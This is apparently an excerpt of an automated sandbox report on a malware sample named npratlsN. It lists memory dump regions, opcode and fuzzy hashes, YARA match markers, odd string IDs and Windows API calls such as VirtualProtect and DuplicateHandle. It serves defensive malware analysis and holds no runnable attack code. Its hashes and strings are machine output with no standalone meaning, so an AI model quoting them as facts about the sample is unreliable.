                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 3de787e665caee6cd32eca97f4019cc7a6df9fdad70e3fc63f3069844a3fcb71
                                                                                                                                                                          • Instruction ID: 48f96e8478b8c9014b2c6071cfbeaf72877ecd9b7938ffff9aeea256a16bad46
                                                                                                                                                                          • Opcode Fuzzy Hash: 3de787e665caee6cd32eca97f4019cc7a6df9fdad70e3fc63f3069844a3fcb71
                                                                                                                                                                          • Instruction Fuzzy Hash: 8641E270E05248CBEB18DFEADA506DEFBF2AF89300F20D129D419AB255DB345946CF51
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 7eea07e3cde8b33e68371de0e336d99f096e8f3dacae71d05c5afc4da4da277d
                                                                                                                                                                          • Instruction ID: 984f140aade557d662226bafbb808e8d9e2b4770c6545b79a1fe34eb170892a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 7eea07e3cde8b33e68371de0e336d99f096e8f3dacae71d05c5afc4da4da277d
                                                                                                                                                                          • Instruction Fuzzy Hash: BF41B070E012188BDB18DFAAD9447DEBBF2BF88304F20D16AD418BB254EB345946CF50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: a1261572e81eefc270a864bfedf97b3c866c0e00b86dc2136b7d2cd4ff765bd3
                                                                                                                                                                          • Instruction ID: 1d4f9fb44f93fea1f45385dfda774c45a73592a044cd1641906c6ef434e7f404
                                                                                                                                                                          • Opcode Fuzzy Hash: a1261572e81eefc270a864bfedf97b3c866c0e00b86dc2136b7d2cd4ff765bd3
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C31F074E01258CBDB18DFAAD8406DEFBF6AF89300F10D16AD418BB295EB345946CF50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 156e0b274267da48df3d463da7e208c37b69653e273bc32994ac0c7f0b009cac
                                                                                                                                                                          • Instruction ID: cb6920c561dbdc528c844918e0b6fdb32a1c16c36babbcc4801ea0856818801f
                                                                                                                                                                          • Opcode Fuzzy Hash: 156e0b274267da48df3d463da7e208c37b69653e273bc32994ac0c7f0b009cac
                                                                                                                                                                          • Instruction Fuzzy Hash: 9972C174E012298FDB64DF69C990BDEBBB2BB49300F1091E9E508AB355DB349E85CF50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 68b1b683d5a33ffea7925e37db3ddbfa80c5b1f01b56e77e8f781fccb1feac1c
                                                                                                                                                                          • Instruction ID: 4eb0e22f23b35db45587b809a1658d7af85be0e333cb47f5f22cde7f08d28731
                                                                                                                                                                          • Opcode Fuzzy Hash: 68b1b683d5a33ffea7925e37db3ddbfa80c5b1f01b56e77e8f781fccb1feac1c
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D910374D00218CFEB14DFA8C984BEDBBB1FF49314F209269E519AB295DB749984CF50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3e37e97c24a87162ec2d425f601c899aa844bc6c03510c7596773970a9e9a2bc
                                                                                                                                                                          • Instruction ID: b7058133afa808d2370842c0af3882e26cdc67f509950565096917dd8b37849f
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e37e97c24a87162ec2d425f601c899aa844bc6c03510c7596773970a9e9a2bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A51A774E01208DFDB18DFA9D594A9EBBF2EF88300F209429E915BB364DB359945CF10
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f98f47a8bea7ebba10c95186dcbd5a9a70b13422852b09f2cea340090a8a8c69
                                                                                                                                                                          • Instruction ID: 01494a8d67a99e3e549983eb7332fe2a80bf59d74f48e9ac1eefe79502268639
                                                                                                                                                                          • Opcode Fuzzy Hash: f98f47a8bea7ebba10c95186dcbd5a9a70b13422852b09f2cea340090a8a8c69
                                                                                                                                                                          • Instruction Fuzzy Hash: 9751A774E00208DFDB18DFAAD594A9EBBF2EF89300F208029E815BB364DB359945CF50

                                                                                                                                                                          [Figure: Control-flow Graph; legend: Executed, Not Executed]
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ({+$4{+$@{+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$^o+$~o+$$^q$$^q
                                                                                                                                                                          • API String ID: 0-3021506185
                                                                                                                                                                          • Opcode ID: 76e262f788168f09b2d868f4253c6e4fa78cc98256d04282cdd9dd3a5228678b
                                                                                                                                                                          • Instruction ID: ada363644e850acc2d4e751bb4cca2583eb9b036ce459767b3c6a359dac2fedf
                                                                                                                                                                          • Opcode Fuzzy Hash: 76e262f788168f09b2d868f4253c6e4fa78cc98256d04282cdd9dd3a5228678b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E523174A00218CFEF149BA8C990B9EBB77FF84340F1485A9D00AAB3A5DF359D859F51
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2598563909-0
                                                                                                                                                                          • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                                                                          • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                                                                                                          • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                          • API String ID: 0-1932283790
                                                                                                                                                                          • Opcode ID: c47cfbc40c42e5a90ea5c8fc6ca189b810007c02489eb56ce508f14ed49041ec
                                                                                                                                                                          • Instruction ID: 71d94d1c205cacc525102726c0595bc733a7c979f55d69513c10c64868d6165a
                                                                                                                                                                          • Opcode Fuzzy Hash: c47cfbc40c42e5a90ea5c8fc6ca189b810007c02489eb56ce508f14ed49041ec
                                                                                                                                                                          • Instruction Fuzzy Hash: 20124634A002089FCF15CF69C984A9EBBF2BF88314F108569F55AEB2A1DB31ED45CB50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                          • API String ID: 0-1317942629
                                                                                                                                                                          • Opcode ID: 757f4cbabd308bdad35a6663c6dd56fb3ea0583af792829c1b779d91d66c478a
                                                                                                                                                                          • Instruction ID: 2cea3011a78e52066c27ecb7a4d790da4470170aeb254474b6d98b848aa7c7ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 757f4cbabd308bdad35a6663c6dd56fb3ea0583af792829c1b779d91d66c478a
                                                                                                                                                                          • Instruction Fuzzy Hash: BE72CF32D062889BCF22DFF495DF15A3F72AF61300B2901DDE9C55B48FD23866148B9A
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3322701435-0
                                                                                                                                                                          • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                          • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                                          • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 2C96BB46
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 2C96BB83
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 2C96BBC0
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 2C96BC19
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090259033.000000002C960000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C960000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c960000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                          • Opcode ID: 3cb17149dca91881f54fef0ae0183a2154d7b34a66d4e0f610ff6ed611ae4ad4
                                                                                                                                                                          • Instruction ID: 6508e71fc700aff5cb65eb646b86edf1e2253f4eb0dbeda9f3a2c6dd3e67d44a
                                                                                                                                                                          • Opcode Fuzzy Hash: 3cb17149dca91881f54fef0ae0183a2154d7b34a66d4e0f610ff6ed611ae4ad4
                                                                                                                                                                          • Instruction Fuzzy Hash: B15157B0901349CFDB14CFAAD588BDEBBF5AF88310F208559D419A73A0DB74A944CF65
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 2C96BB46
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 2C96BB83
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 2C96BBC0
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 2C96BC19
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090259033.000000002C960000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C960000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c960000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                          • Opcode ID: 37b442a77d2dc9ca5e8cea02aa1f79b786ed71a00139930ef8e9e7bb7c51b36f
                                                                                                                                                                          • Instruction ID: 2c4a5c9fb53496c639525d8e7c660f95bc6bc4d08f66f8c4072e7f39f7c729cf
                                                                                                                                                                          • Opcode Fuzzy Hash: 37b442a77d2dc9ca5e8cea02aa1f79b786ed71a00139930ef8e9e7bb7c51b36f
                                                                                                                                                                          • Instruction Fuzzy Hash: 885157B0901349CFDB14CFAAC588BDEBBF5AF88310F208459D419A73A0DB74A944CF65
                                                                                                                                                                          APIs
                                                                                                                                                                          • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1411284514-0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4'^q$4'^q$;^q
                                                                                                                                                                          • API String ID: 0-799016360
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: @>{+$@>{+$@>{+
                                                                                                                                                                          • API String ID: 0-4148728344
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Hbq$Hbq
                                                                                                                                                                          • API String ID: 0-4258043069
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ,bq$,bq
                                                                                                                                                                          • API String ID: 0-2699258169
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: LR^q$LR^q
                                                                                                                                                                          • API String ID: 0-4089051495
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (&^q$(bq
                                                                                                                                                                          • API String ID: 0-1294341849
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4'^q$4'^q
                                                                                                                                                                          • API String ID: 0-2697143702
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: LR^q
                                                                                                                                                                          • API String ID: 0-2625958711
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: LR^q
                                                                                                                                                                          • API String ID: 0-2625958711
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 2D0246AA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2D026D51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2D026D51
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2C96BDDB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090259033.000000002C960000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C960000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c960000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2C96BDDB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090259033.000000002C960000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C960000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c960000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 2D0293C1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 285FEF8C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3074843279.00000000285F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 285F0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_285f0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 2D0246AA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                          APIs
                                                                                                                                                                          • LdrInitializeThunk.NTDLL(00000000), ref: 2C887F4E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
